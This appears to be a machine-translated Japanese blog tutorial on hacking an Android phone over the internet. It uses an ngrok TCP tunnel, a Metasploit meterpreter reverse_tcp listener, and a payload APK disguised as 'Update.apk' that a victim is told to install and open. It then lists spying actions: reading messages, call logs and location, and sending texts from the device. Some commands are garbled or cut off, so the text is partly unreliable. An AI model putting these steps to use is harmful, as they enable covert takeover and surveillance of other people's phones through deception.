Hacking Android Device [Remote]

Hacking over WAN

Youtube で私のビデオチュートリアルをチェックできます:
https://youtu.be/Bbp-AcejtHI

WAN では通常、まず固定 IP/ホスト名を持つ必要があり、次にトラフィックを転送できるようにポート転送を実行しなければなりませんが、ネットワーク内のポートへのアクセスは限定されているので、リアルタイムでは両方とも非常に難しいことは誰もが知っていることです。

そこで、このシナリオでは、Ngrok を使用して安全なトンネルを設定します。

Ngrok は、パブリック エンドポイント、すなわちインターネットからローカルで実行されているネットワーク サービスへのトンネルを確立するトンネリング リバース プロキシ システムです。 これは、私たちのマシン上でローカルに実行されているWebサイトの公開HTTP / HTTPS URLを作成するために私たちを助けることができる。 Ngrok を使用している間は、ポート転送のいかなる種類も行う必要はなく、ネットワーク サービスは最終的に TCP トンネリングの助けを借りてインターネットに公開されます。

次に進むには、次の手順に従います。

Step1: Ngrok アカウントにサインアップしてダウンロードする

最初に、Ngrok アカウントへのサインアップが必要になり、その後、ダウンロード ウィンドウが表示されます。

Signup Window of Ngrok

サインアップ後、あなたの Linux システム用の Ngrok をダウンロードすることが可能です。

簡単にダウンロードしたファイルを解凍します。

Step2: Connect your account

このコマンドを実行するとデフォルト ngrok.yml 設定ファイルにあなたの認証トークンを追加することができます。 これにより、より多くの機能へのアクセスや、より長いセッション時間を得ることができるようになります。 (ログイン後、ngrok のホーム画面で提供されるここに自分のトークンをコピーして貼り付ける必要があります)

./ngrok authtoken <あなたのトークン>

さて、このツールを使用する準備が整いました。 ターミナルを開き、Ngrockツールを解凍したディレクトリに移動し、次のように入力します。

./ngrok tcp

接続したいポート番号を選択します(ここでは、ポート番号として5555を選択しています)。 9672>

ここでいう転送はngrokが作ったTCPトンネルを指定するもので、TCPトンネルはngrokが作ったTCPトンネルのことです。 接続はポート5555でローカルホストにバインドされています。

ステップ 3: ペイロードの生成

Kali Linux マシンで新しいターミナルを開き、次のコードを入力することでこれを行うことができます。tcp.ngrok.io LPORT=15787 R> .apk

しかし今回はLAN内で行った攻撃とは少し違うことを覚えておいてください。 ここでは、IPアドレスの代わりに、ngrokで提供されている転送リンク(2.tcp.ngrok.io)を入力する必要があります。 また、ポート番号は15787になります。

注意: 2.tcp.ngrok.io という IP アドレスの入力がうまくいかない場合は、「ping」コマンドを使用して取得できる IP アドレスで置き換えることができます。

ここで、ペイロードのファイル名として「Update.apk」を使用しました。 このファイルはターゲットのAndroid端末にインストールされるものです。 しかし、このファイルをインストールする前に、リスナーを設定する必要があります。 そのためには、手順4.に従ってください。

Step4: Set-Up a Listener

ターミナルを開き、Metasploit コンソールをロードしてください。

use exploit/multi/handler

次に、次のように入力して reverse payload をセットアップします:

set payload android/meterpreter/reverse_tcp

自分の LHOST を 0.X に設定します。0.0.0、LPORTは5555
(ポート番号はngrokで接続をバインドしたポート番号と同じにする)

set LHOST 0.0.0.0
set LPORT 5555

最後にリスナーを開始するためにexploitと入力します。

リスニングモードはオン

ステップ5:ターゲットのデバイスにMalicious Update.apk ファイルをインストール

被害者にアプリをインストールしてもらい、インストールされたらすぐに実行するように指示します。 被害者がアプリを開くオプションに触れると、アンドロイド端末のすべての機能にアクセスできるようになります。 しかし、アプリが開かれた後、デバイスの画面には何も表示されません。

Post-Exploitation

Type helpで、被害者のデバイス上でさまざまな作業を行うために使用できるオプションを見ることができます。 彼らのメッセージや通話履歴を確認し、自分のシステムに保存することもできます。
また、相手のデバイスにインストールされているあらゆるアプリケーションを表示したり開いたりすることができます。 また、ユーザーの現在地座標を取得することもできます。
相手のデバイスを介して任意の連絡先番号にメッセージを送信することもできます

コメントを残す

メールアドレスが公開されることはありません。